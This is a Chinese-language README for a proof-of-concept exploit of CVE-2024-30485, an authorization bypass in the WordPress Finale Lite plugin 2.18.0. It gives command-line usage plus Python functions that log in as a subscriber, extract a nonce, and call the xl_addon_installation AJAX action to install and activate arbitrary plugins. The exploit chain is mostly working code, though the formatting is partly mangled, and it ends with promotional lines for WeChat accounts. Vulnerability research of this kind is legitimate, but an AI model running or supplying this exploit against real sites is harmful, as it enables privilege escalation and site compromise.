WordPress Finale Lite 插件高危漏洞检测与利用工具 (CVE-2024-30485)

WordPress Finale Lite 插件高危漏洞检测与利用工具 (CVE-2024-30485)项目描述本项目提供了一个针对WordPress Finale Lite插件版本号 2.18.0中高危授权绕过漏洞CVE-2024-30485的安全检测与概念验证工具。该漏洞源于插件的xl_addon_installationAJAX接口缺少必要的权限检查允许已登录的订阅者Subscriber级别及以上用户在未获得管理员授权的情况下远程安装并激活任意插件。此工具可用于安全研究人员快速验证目标系统的脆弱性理解漏洞原理并评估其潜在风险。项目信息详情漏洞编号CVE-2024-30485威胁等级高危 (CVSS 8.8)影响版本Finale Lite 2.18.0漏洞类型授权绕过 (CWE-862)所需权限WordPress 订阅者 (Subscriber) 及以上功能特性身份验证支持使用有效的WordPress用户凭证用户名/密码进行登录获取操作权限。安全令牌提取自动从目标页面的HTML/JavaScript中提取执行敏感操作所需的nonce一次性令牌。任意插件安装利用漏洞接口向目标站点安装指定的插件如hello-dolly,akismet等。插件自动激活在插件安装成功后自动发起激活请求使插件生效最大化漏洞影响。多种预置插件脚本内置了多个常见插件的slug与入口文件映射方便测试。安装指南系统要求Python 3.x需要具备对目标WordPress站点的网络访问权限依赖项安装本项目依赖requests和beautifulsoup4库。您可以使用pip来安装所需依赖。# 推荐使用虚拟环境python3-mvenv venvsourcevenv/bin/activate# Linux/macOS# .\venv\Scripts\activate # Windows# 安装依赖pipinstallrequests beautifulsoup4获取工具代码将脚本保存为CVE-2024-30485.py即可使用。使用说明命令行参数参数简写类型是否必需描述--url-u字符串是目标WordPress站点的根URL--username-U字符串是用于登录的WordPress用户名--password-P字符串是用于登录的WordPress密码plugin(位置参数)字符串否要安装的插件slug。默认为hello-dolly基础使用示例1. 检测漏洞并尝试安装默认插件 (hello-dolly):python3 CVE-2024-30485.py-uhttps://example.com-Usubscriber_user-Pstrong_password2. 检测漏洞并尝试安装指定插件 (例如: disable-comments):python3 CVE-2024-30485.py-uhttps://example.com-Usubscriber_user-Pstrong_password disable-comments3. 查看完整帮助信息:python3 CVE-2024-30485.py-h典型工作流程用户认证使用提供的凭证模拟登录WordPress获取带有wordpress_logged_inCookie的会话。令牌获取访问插件管理页面/wp-admin/admin.php?pagexl-payments并从返回的HTML/JS中正则匹配提取nonce值。利用漏洞构造包含actionxl_addon_installation的POST请求发送至/wp-admin/admin-ajax.php利用提取到的nonce和指定的插件信息进行安装。激活插件安装成功后再次发送激活请求使插件生效。输出示例[]Target is vulnerable!Detected version:2.18.0[]Loggedinsuccessfully.[]Extracted Nonce: 2b46e05bc0[]Plugindisable-commentsinstalled successfully![]Plugindisable-commentsactivated successfully!核心代码漏洞版本检测defcheck_vulnerability(url):responserequests.get(version_url,headers{User-Agent:Mozilla/5.0},verifyFalse)ifresponse.status_code200:matchre.search(rStable tag: ([0-9\.]),response.text)ifmatch:versionmatch.group(1)ifversion2.18.0:print(f[] Target is vulnerable! Detected version:{version})returnTrueprint([-] Target is not vulnerable or version check failed.)returnFalse漏洞利用核心逻辑此部分演示了如何利用缺失授权的xl_addon_installationAJAX接口进行任意插件安装。definstall_plugin(url,session,nonce,plugin_slug,plugin_file):installed_plugins_urlf{url}/wp-admin/plugins.phpresponsesession.get(installed_plugins_url,headers{User-Agent:Mozilla/5.0},verifyFalse)ifplugin_sluginresponse.text:print(f[] Plugin {plugin_slug} is already installed. Skipping installation.)else:install_urlf{url}/wp-admin/admin-ajax.php# 关键利用点构造 xl_addon_installation 请求install_data{action:xl_addon_installation,# 易受攻击的 actionxl_slug:plugin_slug,xl_file:plugin_file,nonce:nonce}responsesession.post(install_url,datainstall_data,headers{User-Agent:Mozilla/5.0},verifyFalse)# 检查安装是否成功ifPlugin installed successfully!inresponse.textoralready installedinresponse.text:print(f[] Plugin {plugin_slug} installed successfully!)returnTruereturnFalse安全令牌Nonce提取脚本通过正则表达式从插件设置页面的响应内容中提取用于授权的nonce值。defget_nonce(url,session):settings_urlf{url}/wp-admin/admin.php?pagexl-paymentsresponsesession.get(settings_url,headers{User-Agent:Mozilla/5.0},verifyFalse)# 从页面JavaScript或HTML中匹配 nonce 值matchre.search(rnonce:([a-f0-9]),response.text)ifmatch:print(f[] Extracted Nonce:{match.group(1)})returnmatch.group(1)print([-] Failed to extract Nonce.)returnNone插件激活在安装成功后利用WordPress的标准激活流程和之前获取的nonce来激活插件完成整个攻击链。defactivate_plugin(url,session,nonce,plugin_slug):activate_urlf{url}/wp-admin/admin-ajax.phpactivate_data{action:activate-plugin,# 标准的插件激活actionplugin:f{plugin_slug}/{plugin_slug}.php,_wpnonce:nonce# 复用之前提取的nonce}responsesession.post(activate_url,dataactivate_data,headers{User-Agent:Mozilla/5.0},verifyFalse)ifPlugin activatedinresponse.textoractivated successfullyinresponse.text:print(f[] Plugin {plugin_slug} activated successfully!)else:print([-] Failed to activate plugin.)6HFtX5dABrKlqXeO5PUv/xFe0Y10EdWNEZGHtzXMDCs更多精彩内容 请关注我的个人公众号 公众号办公AI智能小助手对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号网络安全技术点滴分享